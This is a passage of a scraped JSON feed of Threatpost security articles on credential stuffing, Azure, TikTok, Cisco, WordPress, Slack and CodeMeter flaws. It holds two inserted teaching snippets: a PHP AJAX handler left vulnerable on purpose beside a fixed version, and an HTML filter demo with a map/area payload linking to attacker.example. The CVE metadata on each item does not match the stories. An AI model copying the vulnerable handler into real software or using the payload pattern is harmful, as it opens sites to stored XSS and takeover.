needs to be talked about, because a lot of times you\u2019ll see DDoS used as a precursor or a backer to other types of attacks. So, you know, trying to focus on just one one vector or one aspect of your attack surface does you no good.\n\n**LO: **Right. 
And I also wanted to ask about credential stuffing, that was another big part of the report and you know, that figure you mentioned earlier about, was it 55 million \u2013\n\n**SR:** 55 million was the attack shortly after we put out the last report. And it was all credential stuffing. And it was against a financial services company. So this, this particular attack, this was a 24 hour period, and it just stands out because this proves that, when it comes to how criminals are leveraging credential stuffing, they\u2019re laser focused. And so they really really really want to get as much as they can out of these combination lists that they\u2019re using, because they only have a short shelf life. So they wanted, they hit as much as they can for as long as they can. And then they swap out the list and keep going. And we\u2019ve seen that a lot over the last couple of years to where these lists. They use them everywhere.\n\n**LO:** Yeah, I mean, well, when you look at also kind of the financial services industry, I think that you had mentioned that they\u2019re still using usernames and passwords. And I think that there needs to be a rethink of authentication.\n\n**SR:** Oh, yeah, I agree. I really like that, you know, the financial services industry is getting more and more in tune with multi-factor authentication, and they\u2019re not just relying on usernames and passwords anymore, they\u2019re adding more to it, which is good for the public. It\u2019s good for them. I mean, it works all around, but unfortunately, not everybody does that. And that\u2019s why you see credential stuffing taking off because the criminals know that in some cases, all they need is a user name and password, right. And so they go from there. It\u2019s not just financial services where we\u2019re seeing this. We\u2019re seeing this in other sectors as well, travel and hospitality, it\u2019s a thing we\u2019re looking at. 
Gaming is another industry that\u2019s seeing a lot of credential abuse. So right, it\u2019s moving around.\n\n**LO:** Yeah, that seems like a big problem, just across the industry as a whole. But when you look ahead to 2020, between, you know, all the different types of threats that you were seeing in your report, do you think one is going to kind of stand out whether it\u2019s kind of APIs being targeted?\n\n**SR:** We\u2019re going to see more targeted APIs, you\u2019re going to see that go up, I think and I think we\u2019re also going to see more focus on credential stuffing as the year goes on. I think credential abuse is because of its point and click nature and its low barrier of entry for criminals, everybody\u2019s jumping on it. Right now when I do my research to look at what groups are doing and how they\u2019re doing it, credential stuffing is the top that they\u2019re going for. Because there are automated tools that literally, you load up your list you point at a domain, and you go. And it\u2019s very noisy. So these types of attacks stand out on a network, which is why we\u2019re able to track them like we do. But unfortunately, they\u2019re effective, which is why you see them so much.\n\n**LO:** Right, unfortunately.\n\n**SR:** Unfortunately, they are effective.\n\n**LO:** Yeah. I also wanted to ask, before we wrap up, when you are looking at the financial services industry, what advice would you have in terms of best steps for protection or mitigation against these types of attacks?\n\n**SR:** So the biggest complaint I see criminals talk about is multi factor authentication. So not only enabling that but enforcing it, would be one of the things I would encourage financial services or any industry really, you know, start using multi factor authentication, enforce it. Don\u2019t make it to where, oh, it\u2019s there if you want to use it, teach your user base, how to use this teach them, why it\u2019s important. 
So education, and more options, I think, would be a good run of the mill. When it comes to API attacks, I would suggest keeping an eye on threading and keeping an eye on rate limiting. Don\u2019t let somebody make a half a million attempts against your API, track that stuff.\n\n**LO:** Yeah.\n\n**SR:** And unfortunately, visibility in the API space is not as large as it is in some of the other attack surfaces that companies experience. So that needs to be, you need more visibility.\n\n**LO:** Well, good things to think about when we\u2019re moving forward. So Steve, thank you so much for speaking with us and have a great rest of your show.\n\n**SR:** Thanks.\n", "cvss3": {}, "published": "2020-03-12T13:57:20", "type": "threatpost", "title": "Akamai Talks Massive Uptick in Credential-Stuffing Attacks Against Bank APIs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-12T13:57:20", "id": "THREATPOST:0C6C445BFBCD8AD47CA5B91A506DB09E", "href": "https://threatpost.com/akamai-on-credential-stuffing-attacks/153654/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:08", "description": "A major Microsoft crypto-spoofing bug impacting Windows 10 [made waves this Patch Tuesday](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>), particularly as the flaw was found and reported by the U.S. 
National Security Agency (NSA).\n\nMicrosoft\u2019s January Patch Tuesday security bulletin disclosed the \u201cimportant\u201d-severity vulnerability, which could allow an attacker to spoof a code-signing certificate, vital to validating executable programs in Windows, and make it appear as if an application was from a trusted source.\n\nThreatpost talked to Pratik Savla, senior security engineer at Venafi, about the vulnerability, whether the hype around the flaw was warranted, and what the disclosure means for the NSA.\n\n[**For direct download click here.**](<http://traffic.libsyn.com/digitalunderground/Patch_Tuesday.mp3>)\n\n_**Also, check out our [podcast microsite](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>), where we go beyond the headlines on the latest news.**_\n", "cvss3": {}, "published": "2020-01-15T20:47:18", "type": "threatpost", "title": "Podcast: NSA Reports Major Crypto-Spoofing Bug to Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-15T20:47:18", "id": "THREATPOST:4F15F64975E3F5BE228AE0A72697EE31", "href": "https://threatpost.com/podcast-nsa-reports-major-crypto-spoofing-bug-to-microsoft/151900/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:18:37", "description": "Researchers have disclosed two flaws in Microsoft\u2019s Azure web hosting application service, App Services, which if exploited could enable an attacker to take over administrative servers.\n\nAzure App Services is an HTTP-based service for hosting web applications, and is available in both Microsoft Azure Cloud and on-premise 
installations. Researchers found two vulnerabilities in the cloud service that specifically affect Linux servers.\n\n\u201cThe two vulnerabilities we found allow us to combine them and enable any attacker with the ability to forge post requests (SSRF) or [remote] code execution on an Azure App Service to take over the Azure App Service administration server,\u201d said Paul Litvak, [researcher with Intezer, in a Thursday post](<https://www.intezer.com/blog/cloud-security/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/>).\n\nBoth flaws were discovered three months ago and reported to Microsoft. Microsoft has since issued a fix. The vulnerabilities do not have CVE assignments.\n\n## KuduLite Bugs\n\nThe first flaw stems from an open-source project called KuduLite within Azure App Services. This Linux project manages the administration page that\u2019s used to register admins into the App Service Plan (to start using App Services a user must first create an App Service Plan).\n\nAfter discovering that the KuduLite instance\u2019s SSH service uses hardcoded credentials \u201croot:Docker!\u201d to access the application node, researchers were able to log in as root.\n\n\u201cAs a reminder, the developers of the App Service KuduLite made sure admins were only able to log into it as a low privileged user, so we knew this was unintended.\u201d\n\nAfter taking control of the KuduLite instance, researchers could then gain control over the Software Configuration Management (SCM) web server, which systematically manages and controls changes in the documents and codes during the Software Development Life Cycle. 
This allowed them to then listen to a user\u2019s HTTP requests to the SCM web page, add their own pages and inject malicious JavaScript into the user\u2019s web page.\n\n\u201cThe user may also choose to let App Services manage the git server, in which case the server will be managed by KuduLite,\u201d said researchers. \u201cThe attacker could then add malicious code to the repository to achieve persistence and spread to other instances using the same git server.\u201d\n\nThe second flaw exists in the KuduLite API. The issue here stems from the application node being able to send requests to the KuduLite API sans access validation \u2013 an error that is especially problematic when considering a web app with an SSRF vulnerability, researchers said.\n\n\u201cAn attacker who manages to forge a GET request may access the application node\u2019s file system via the KuduLite VFS API,\u201d said researchers. \u201cThis would enable an attacker to easily steal source code and other assets on the application node.\u201d\n\nAn attacker who manages to forge a POST request, meanwhile, may achieve remote code execution on the application node via the command API, they said. And, in Windows (where Kudu is used), packets sent from the application node to the manager node are dropped.\n\nThese two vulnerabilities can be chained together, since once an attacker achieves code execution with the second vulnerability, they can then exploit the first one. 
One potential attack vector here is for an attacker to use this flaw to implant a phishing page in what\u2019s supposed to be the SCM web page (as seen in the video below).\n\nResearchers stressed that [cloud security is still relatively new](<https://threatpost.com/category/cloud-security/>), making it essential to research and document new attack surfaces that arise when using these services.\n\n\u201cAs a general best practice, runtime cloud security is an important last line of defense and one of the first actions you can take to reduce risk, since it can detect malicious code injections and other in-memory threats that take place after a vulnerability has been exploited by an attacker,\u201d they said.\n", "cvss3": {}, "published": "2020-10-08T15:28:37", "type": "threatpost", "title": "Microsoft Azure Flaws Open Admin Servers to Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-10-08T15:28:37", "id": "THREATPOST:DBAD84DFBF09E2C28414A18721E5CA90", "href": "https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:38", "description": "Researchers say they have discovered several major vulnerabilities in the short form video app TikTok. The reported vulnerabilities come as [scrutiny](<https://threatpost.com/tiktok-banned-by-u-s-army-over-china-security-concerns/151480/>) around the Chinese-owned platform increases.\n\nResearchers say the most serious vulnerability in the platform could allow attackers to remotely take control over parts of victims\u2019 TikTok account, such as uploading or deleting videos and changing settings on videos to make \u201chidden\u201d videos public. Researchers also discovered a separate vulnerability that allowed them to obtain personal data of victims, such as email addresses and more.\n\n\u201cMany of us use the TikTok app to share enjoyable moments and snip bits of fun memories in the form of a short video clips,\u201d researchers with Check Point Research [said on Wednesday](<https://research.checkpoint.com/2020/tik-or-tok-is-tiktok-secure-enough/>). 
\u201cBut as some have experienced, there is often a fine line between fun clips to private, even intimate assets being compromised while trusting to be under the protection from the apps we use.\u201d\n\nTikTok, a social media app with over 1.3 billion installs worldwide, is owned by Beijing-based parent company ByteDance. ByteDance was notified in November of the flaws and fixed the issue on Dec. 15, researchers said.\n\nThe first vulnerability allowed partial account takeover via SMS link spoofing. Researchers were able to spoof a TikTok SMS link that invites users to download the application.\n\nA potential attacker could send an SMS invite message to a victim by capturing the HTTP request with a proxy tool (such as Burp Suite), inputting the victim\u2019s phone number into the \u201cMobile\u201d parameter, and changing the \u201cdownload_url\u201d parameter into a malicious URL of their choosing. The victim would then be sent a legitimate message from TikTok asking them to download the app, with a link to the attacker-controlled malicious domain.\n\nThis opens the victim up to an array of attacks, researchers said. \u201cWe found that it is possible to send a malicious link to a victim that will result in redirecting the victim to a malicious website. 
The redirection opens the possibility of accomplishing Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF) and Sensitive Data Exposure attacks without user consent,\u201d they wrote.\n\nResearchers found that they could take this attack a step further and send requests on behalf of the user after the victim has opened the URL \u2013 enabling them to take over parts of victims\u2019 accounts.\n\n\u201cWith the lack of anti-Cross-Site request forgery mechanism, we realized that we could execute JavaScript code and perform actions on behalf of the victim, without his/her consent,\u201d researchers said.\n\nFinally, researchers said that once they had partial control over victims\u2019 accounts, they were able to make several API calls (in the https://api-t[.]tiktok[.]com and https://api-m[.]tiktok[.]com subdomains), which would then reveal sensitive information about the victim including email address, payment information and birthdates.\n\n\u201cTikTok is committed to protecting user data. Like many organizations, we encourage responsible security researchers to privately disclose zero day vulnerabilities to us,\u201d a TikTok spokesperson said in a media statement. \u201cBefore public disclosure, Check Point agreed that all reported issues were patched in the latest version of our app. We hope that this successful resolution will encourage future collaboration with security researchers.\u201d\n\nThe security flaws come as backlash [swells around TikTok\u2019s relationship with China](<https://threatpost.com/tiktok-banned-by-u-s-army-over-china-security-concerns/151480/>), leading the United States Army this week to announce that U.S. soldiers can no longer have the social media app on government-owned phones.\n", "cvss3": {}, "published": "2020-01-08T14:30:42", "type": "threatpost", "title": "TikTok Riddled With Security Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-08T14:30:42", "id": "THREATPOST:F45A1AEACEC0BF32FC6CDCECDF2B458D", "href": "https://threatpost.com/tiktok-riddled-with-security-flaws/151616/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:26:27", "description": "Cisco Systems has fixed two high-severity vulnerabilities in its products, including one in its popular Webex video conferencing platform that could enable a remote attacker to execute commands.\n\nThe high-severity Webex flaw exists in the web-based management interface of Cisco Webex Video Mesh, a feature that enables on-premises infrastructure for video conferencing, to enhance audio, video and content.\n\n\u201cA successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux operating system with root privileges on a targeted node,\u201d according to Cisco\u2019s [security advisory, released this week](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200108-webex-video>).\n\nWhile attackers can exploit the flaws remotely, they would need to be authenticated, according to the advisory, meaning they would first need to log into the web-based management interface with administrative privileges and then supply crafted requests to the application. 
The Webex Video Mesh management interface does not properly validate the user-supplied input in these requests, so an attacker who already holds an administrative login can use them to execute arbitrary commands as root on the node.\n\nThe vulnerability affects Cisco Webex Video Mesh Software releases earlier than 2019.09.19.1956m (the fixed version). The flaw, found during internal security testing, has a CVSS score of 7.2 out of 10, making it high-severity. Cisco said that it is not aware of any exploits against the flaw in the wild.\n\nThe networking giant on Wednesday also released fixes for another high-severity glitch in the web user interface of Cisco IOS and Cisco IOS XE Software. IOS XE, a Linux-based version of Cisco\u2019s Internetworking Operating System (IOS), is software that powers Cisco routers and switches. Products supported by IOS XE include enterprise switches (including Cisco\u2019s Catalyst series), branch routers and edge routers such as the ASR 1013.\n\nThe vulnerability could enable an unauthenticated, remote attacker to launch a cross-site request forgery (CSRF) attack on affected systems. In a CSRF attack the attacker never logs in: the victim, typically lured by a social-engineering email into following a specially-crafted link, is already logged in to the device\u2019s web UI in the same browser, and that browser sends the forged request with the victim\u2019s session attached, so the device treats it as a legitimate action by that user.\n\nThe vulnerability stems from \u201cinsufficient CSRF protections for the web UI on an affected device,\u201d according to Cisco. An attacker could first exploit the flaw by persuading a user to follow a malicious link.\n\nThen, \u201ca successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the targeted user,\u201d according to [Cisco\u2019s advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200108-ios-csrf>). 
\u201cIf the user has administrative privileges, the attacker could alter the configuration, execute commands or reload an affected device.\u201d\n\nThe flaw, discovered by Mehmet \u00d6nder Key, affects Cisco devices running releases of Cisco IOS or Cisco IOS XE Software earlier than 16.1.1 with the HTTP Server feature enabled; the vulnerable web UI is only reachable through that feature, so devices with it disabled are not exposed. Cisco said that it is not aware of any exploits in the wild against the flaw, which ranks 8.8 out of 10 on the CVSS scale.\n\n[Cisco overall on Wednesday](<https://tools.cisco.com/security/center/publicationListing.x>) issued 14 patches for flaws across its products: 12 medium-severity flaws and the two high-severity flaws above. Last week, the company [issued patches for three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) impacting a key tool for managing its network platform and switches. Those bugs could allow an unauthenticated, remote attacker to bypass endpoint authentication and execute arbitrary actions with administrative privileges on targeted devices, the company said.
\n", "cvss3": {}, "published": "2020-01-10T17:24:29", "type": "threatpost", "title": "Cisco Webex Bug Allows Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-10T17:24:29", "id": "THREATPOST:0675FD2F1907119072EAFF965E2B7E2C", "href": "https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:24:29", "description": "The developer of a popular WordPress plugin, which helps make websites compliant with the General Data Protection Regulation (GDPR), has issued a fix for a critical flaw. If exploited, the vulnerability could let any logged-in user, even one holding only the low-privileged subscriber role, modify site content or inject malicious JavaScript code into victim websites.\n\nThe plugin, [GDPR Cookie Consent](<https://wordpress.org/plugins/cookie-law-info/>), which helps businesses display cookie banners to show that they are compliant with [EU\u2019s privacy regulation](<https://threatpost.com/ahead-of-gdpr-information-governance-comes-into-its-own/132209/>), has more than 700,000 active installations \u2013 making it a ripe target for attackers. The vulnerability, which does not yet have a CVE number, affects GDPR Cookie Consent version 1.8.2 and below. Earlier this week, after the developer was notified of the critical flaw, the GDPR Cookie Consent plugin was removed from the [WordPress.org](<http://wordpress.org/>) plugin directory \u201cpending a full review\u201d according to the plugin\u2019s directory page. The new version, 1.8.3, was released by Cookie Law Info, the developer behind the plugin, on Feb. 
10.\n\n\u201cThere were a number of code changes, but those relevant to security include a capabilities check added to an AJAX endpoint used in the plugin\u2019s administration pages,\u201d according to researchers with [Wordfence this week](<https://www.wordfence.com/blog/2020/02/improper-access-controls-in-gdpr-cookie-consent-plugin/>). While Wordfence disclosed details of the vulnerability, it was discovered by Jerome Bruandet, a security researcher with NinTechNet, who also detailed his findings [in a Wednesday post](<https://blog.nintechnet.com/wordpress-gdpr-cookie-consent-plugin-fixed-vulnerability/>).\n\nThe vulnerability stems from improper access controls in an endpoint used by the plugin\u2019s AJAX API (the browser-side code of the plugin\u2019s admin pages calls back into the server through WordPress\u2019s admin-ajax.php handler). The dispatcher for those calls is the plugin\u2019s \u201c__construct\u201d method, the PHP constructor that runs when the plugin object is created. AJAX actions sent to it are executed without any check of who is asking.\n\nBecause of this, the AJAX endpoint, intended to be accessible only to administrators, actually also allowed subscriber-level users to perform a number of actions that can compromise the site\u2019s security, researchers said. A subscriber is a WordPress user role with very limited capabilities, usually just logging into the website and leaving comments; on sites with open registration anyone can obtain one.\n\nThe \u201c__construct\u201d method accepts three different values from the AJAX API. Two of them, save_contentdata and autosave_contant_data, can be leveraged for exploitation by an attacker.\n\nThe save_contentdata method is used to allow administrators to save the GDPR cookie notices to the database as a page post type. 
However, since this method performs no capability check, any authenticated user, including a subscriber, can modify any existing page or post (or the entire website), and take them offline by changing their status from \u201cpublished\u201d to \u201cdraft.\u201d\n\n\u201cAdditionally, it is possible to delete or change their content. Injected content can include formatted text, local or remote images as well as hyperlinks and shortcodes,\u201d Bruandet said.\n\nThe other method, autosave_contant_data, is used to save the GDPR cookie info page in the background while the admin is editing it, by writing the data into the cli_pg_content_data database field without validating it. The lack of checks for this method could allow an authenticated user to store JavaScript code in that field. The code is then loaded and executed in the browser of everyone who visits the \u201chttp://example.com/cli-policy-preview/\u201d page, a stored cross-site scripting condition that hits administrators opening the preview just as it hits anonymous visitors.\n\nWordfence urges plugin users to update as soon as possible: \u201cThis vulnerability has been fixed in version 1.8.3. We recommend that users immediately update to the latest version available.\u201d
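The checks that were missing, as an added example that is not the GDPR Cookie Consent plugin's own code: a WordPress AJAX handler written first the way the article describes the vulnerable path (no capability check) and then hardened. The hook and action name (example_gdpr_save), the function names and the request field names are hypothetical; the WordPress functions called (add_action, current_user_can, check_ajax_referer, wp_kses_post, wp_unslash, wp_update_post, wp_send_json_error, wp_send_json_success) are the real platform API.

```php
<?php
// Added example, not the GDPR Cookie Consent plugin's code. The hook/action
// name example_gdpr_save, the function names and the request fields are
// hypothetical; the WordPress API calls are real.

// BEFORE: WordPress dispatches admin-ajax.php requests from *any* logged-in
// user to the matching wp_ajax_{action} handler. If the handler itself never
// asks who is calling, a subscriber reaches it exactly as an administrator.
function example_gdpr_save_contentdata_vulnerable() {
    $post_id = absint( $_POST['post_id'] );
    $status  = $_POST['status'];   // 'draft' here silently unpublishes the page
    $content = $_POST['content'];  // arbitrary HTML, <script> included

    wp_update_post( array(
        'ID'           => $post_id,
        'post_status'  => $status,
        'post_content' => $content,
    ) );
    wp_send_json_success();
}

// AFTER: the three checks that were absent above.
function example_gdpr_save_contentdata_fixed() {
    // 1. Authorization: this is an admin-only feature, so require a
    //    capability that only administrators hold. Subscribers stop here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // 2. Anti-CSRF: the admin page embeds wp_create_nonce( 'example_gdpr_save' )
    //    in the request as the 'security' field; a request forged from another
    //    site cannot know it. check_ajax_referer() terminates on mismatch.
    check_ajax_referer( 'example_gdpr_save', 'security' );

    // 3. Input validation: accept only the states the feature needs, and pass
    //    the HTML through WordPress's post-content tag/attribute allowlist so
    //    stored <script> tags and on* handlers never reach the database.
    $post_id = absint( $_POST['post_id'] ?? 0 );
    $status  = ( ( $_POST['status'] ?? '' ) === 'draft' ) ? 'draft' : 'publish';
    $content = wp_kses_post( wp_unslash( $_POST['content'] ?? '' ) );

    // Only the page post type the feature writes should be reachable here,
    // not arbitrary posts chosen by the caller.
    if ( ! $post_id || get_post_type( $post_id ) !== 'page' ) {
        wp_send_json_error( 'invalid target', 400 );
    }

    wp_update_post( array(
        'ID'           => $post_id,
        'post_status'  => $status,
        'post_content' => $content,
    ) );
    wp_send_json_success();
}

// Only the fixed handler is wired up. There is deliberately no
// wp_ajax_nopriv_ registration, so anonymous visitors cannot call it at all.
add_action( 'wp_ajax_example_gdpr_save', 'example_gdpr_save_contentdata_fixed' );
```

The check that matters most is the first one: a `wp_ajax_` hook only establishes that the caller is logged in, not which role they hold, so every handler has to make the capability decision itself. The nonce is a separate control; it stops an attacker from making an administrator's browser perform the action on their behalf, which the capability check alone does not prevent.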
\n", "cvss3": {}, "published": "2020-02-13T20:21:09", "type": "threatpost", "title": "Critical WordPress Plugin Bug Afflicts 700K Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-13T20:21:09", "id": "THREATPOST:D002CB7A00429994A6A05F968060A826", "href": "https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-16T22:16:01", "description": "A critical vulnerability in the popular Slack collaboration app would allow remote code-execution (RCE). Attackers could gain full remote control over the Slack desktop app with a successful exploit \u2014 and thus access to private channels, conversations, passwords, tokens and keys, and various functions. They could also potentially burrow further into an internal network, depending on the Slack configuration, according to a security report.\n\nThe bug, rated between 9 and 10 on the CVSS vulnerability-severity scale, was disclosed on Friday and involves cross-site scripting (XSS) and HTML injection. Slack for Desktop (Mac/Windows/Linux) prior to version 4.4 is vulnerable.\n\n\u201cWith any in-app redirect-logic/open redirect, HTML or JavaScript injection, it\u2019s possible to execute arbitrary code within Slack desktop apps,\u201d wrote a bug-hunter going by the handle \u201coskarsv,\u201d who submitted [a report](<https://hackerone.com/reports/783877>) on the bug to Slack via the HackerOne platform (earning $1,500). 
\u201cThis report demonstrates a specifically crafted exploit consisting of an HTML injection, security control bypass and an RCE JavaScript payload.\u201d\n\nAccording to the disclosed technical writeup, attackers could trigger an exploit by overwriting Slack desktop app \u201cenv\u201d functions to create a tunnel via BrowserWindow, and then execute arbitrary JavaScript, in what is \u201ca weird XSS case,\u201d he said.\n\n## **Technical Details**\n\nTo exploit the bug, attackers would need to upload a file with the payload to their own HTTPS-enabled server; then, they could prepare a Slack post with an HTML injection containing the attack URL pointing to that payload (hidden in an image). After that, they need only share that post with a public Slack channel or user. If a user clicks on the booby-trapped image, the code is executed on the victim\u2019s machine.\n\nAs for accomplishing the HTML injection, the issue lies in the way Slack posts are created, according to the researcher.\n\n\u201c[Creating a post] creates a new file on https://files.slack.com with [a specific] JSON structure,\u201d according to the writeup. \u201cIt\u2019s possible to directly edit this JSON structure, which can contain arbitrary HTML.\u201d\n\noskarsv added, \u201cJavaScript execution is restricted by [Content Security Policy](<https://threatpost.com/google-chrome-bug-data-theft/158217/>) (CSP) and various security protections are in place for HTML tags (i.e. banned iframe, applet, meta, script, form etc. and target attribute is overwritten to _blank for A tags). 
However, it is still possible to inject area and map tags, which can be used to achieve a one-click-RCE.\u201d He further explained that the URL of the malicious payload could be placed in the area tag\u2019s href.\n\noskarsv also found that emails (when sent as plaintext) are stored unfiltered on Slack servers \u2013 a situation that can be abused to host the RCE payload without attackers needing their own hosting.\n\n\u201cSince it\u2019s a trusted domain, it could contain a phishing page with a fake Slack login page or different arbitrary content which could impact both security and reputation of Slack,\u201d he explained. \u201cThere are no security headers or any restrictions at all as far as I could tell and I\u2019m sure some other security impact could be demonstrated with enough time.\u201d\n\nRegardless of approach, exploits can be used to execute any attacker-provided command, according to the researcher.\n\n\u201cThe payload can be easily modified to access all private conversations, files, tokens etc., without executing commands on the user\u2019s computer,\u201d he wrote, \u201c[or] access to private files, private keys, passwords, secrets, internal network access, etc.\u201d\n\nFurther, the payload could be made \u201cwormable\u201d so that it re-posts to all user workspaces, the researcher added.\n\nUsers should make sure their Slack desktop apps are upgraded to at least version 4.4 in order to avoid attacks. The bug was patched in February, but has only now been disclosed because of a HackerOne disclosure hiatus on all bugs, which was in effect for several months.
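Why a list of banned tags is the wrong shape of control, as an added illustration that is not Slack's code (Slack's actual filter is not public): a denylist modelled on the protections the researcher lists, beside an allowlist built on PHP's strip_tags(). The payload is constructed for this example, and the host attacker.example is a placeholder.

```php
<?php
// Added example, not Slack's code. It shows the researcher's point in code:
// a denylist that bans iframe/applet/meta/script/form still passes <map> and
// <area>, which carry a clickable URL of the attacker's choosing.

// Denylist: remove the tags someone thought of; pass everything else.
function denylist_filter( string $html ): string {
    $banned = 'iframe|applet|meta|script|form|object|embed';
    return preg_replace( '#</?(?:' . $banned . ')\b[^>]*>#i', '', $html );
}

// Allowlist: keep only the tags named here; everything else is removed,
// including tags nobody anticipated when the list was written.
function allowlist_filter( string $html ): string {
    return strip_tags( $html, '<p><b><i><code><ul><li><br>' );
}

// True if an <area ...> tag survived filtering.
function contains_area_tag( string $html ): bool {
    return (bool) preg_match( '#<area\b#i', $html );
}

// Constructed payload in the shape the writeup describes: innocuous text plus
// an image map whose <area> points at the attacker's URL. None of the
// denylisted tags appear in it, so the denylist has nothing to remove.
$payload = '<p>Quarterly numbers attached.</p>'
    . '<map name="m"><area shape="rect" coords="0,0,300,200"'
    . ' href="https://attacker.example/payload"></map>'
    . '<img usemap="#m" src="https://attacker.example/chart.png">';

printf( "denylist keeps <area>:  %s\n", contains_area_tag( denylist_filter( $payload ) ) ? 'yes' : 'no' );
printf( "allowlist keeps <area>: %s\n", contains_area_tag( allowlist_filter( $payload ) ) ? 'yes' : 'no' );
```

Two caveats for anyone adapting this. strip_tags() decides on tag names only and leaves the attributes of allowed tags untouched, so `<b onmouseover="...">` passes it; a production sanitizer must allowlist attributes as well (HTML Purifier on the server, DOMPurify in the client). And a sanitizer is one layer: the researcher's chain still needed the CSP and the link-handling logic to be bypassed, which is why the fix for a desktop client is to treat every rendered post as untrusted rather than to grow the banned-tag list.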
\n", "cvss3": {}, "published": "2020-08-31T15:36:29", "type": "threatpost", "title": "Critical Slack Bug Allows Access to Private Channels, Conversations", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-31T15:36:29", "id": "THREATPOST:694A3BE8CD7B0AD2CFE4B7CB47818F4A", "href": "https://threatpost.com/critical-slack-bug-access-private-channels-conversations/158795/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:13:36", "description": "While patch management already presents challenges for enterprises, it\u2019s even more of a headache for manufacturers and other industrial firms \u2013 who may even need to shut down entire factory operations in order to apply fixes.\n\nSharon Brizinov, the principal vulnerability researcher with Claroty, has discovered and reported various security flaws in industrial control systems (ICS), including most recently vulnerabilities in a software component used by various critical infrastructure systems ([which he disclosed last week](<https://threatpost.com/severe-industrial-bugs-takeover-critical-systems/159068/>)).\n\n[**Download the podcast here or listen 
below.**](<http://traffic.libsyn.com/digitalunderground/Claroty_Podcast.mp3>)\n\nBrizinov told Threatpost that because CodeMeter is a third-party component bundled with various leading ICS products (including those of Rockwell Automation and Siemens), users may be unaware that it\u2019s running in their environments. The issue is indicative of larger patch-management challenges in the industrial space, where there are difficulties not only for industrial system manufacturers, but for end users themselves, he said.\n\n\u201cWhen we\u2019re talking about ICS, it\u2019s a bit more dangerous, and we should be more alert than the usual IT network,\u201d Brizinov said in this week\u2019s Threatpost podcast. \u201cAnd that\u2019s because operational-technology networks, SCADA networks, contain some dangerous parts.\u201d\n\n_Below is a lightly edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell-Welch**: Welcome back to the Threatpost podcast. This is Lindsey O\u2019Donnell-Welch with Threatpost. And I am joined today by Sharon Brizinov, the principal vulnerability researcher with Claroty, who is going to be talking about some new critical security flaws that were recently discovered in a software component utilized by various industrial systems, as well as industrial control system security in general. So, Sharon, thank you so much for joining us today.\n\n**Sharon Brizinov:** Yeah, thank you. Happy to be here.\n\n**LO:** Great. So just to set the context a little bit here. 
Last week, researchers [discovered six critical flaws in CodeMeter](<https://threatpost.com/severe-industrial-bugs-takeover-critical-systems/159068/>), which is a software management component that is licensed by several of the top industrial control system software vendors, such as Rockwell Automation and Siemens. Now, CodeMeter, what it does is it gives these companies the different components and tools to help with their licensing models and to bolster security and protect against reverse engineering and piracy. So Sharon, can you tell us a little bit about these vulnerabilities, and, just to start, how you first discovered them?\n\n**SB:** Yeah, sure. So we actually started the research, I think, one and a half years ago. We started to notice that a lot of products, especially in the ICS domain, are shaped and distributed alongside with a software called CodeMeter. So we were curious why CodeMeter was so common in the ICS domain. And we started to take a look at it. And we discovered, with our research, we discovered six different vulnerabilities that we were able to convert into two different attack scenarios. So we were able to prove that attackers can leverage these six vulnerabilities into the threat vectors that I mentioned. And in one of the attack vectors, attackers can attack the victims using a specifically crafted website. And the second attack vector, attackers can attack the victim by just remotely communicating with the CodeMeter server that is located on the machines.\n\n**LO:** Right. So that sounds like there are varying levels of impact and kind of various levels of severity as well here. Where did the vulnerabilities exist? Were they all in the same area of CodeMeter? Or were they more distributed across the software component?\n\n**SB:** So actually, they\u2019re distributed. So there are six vulnerabilities. So some of them are in the protocol communication part of CodeMeter. 
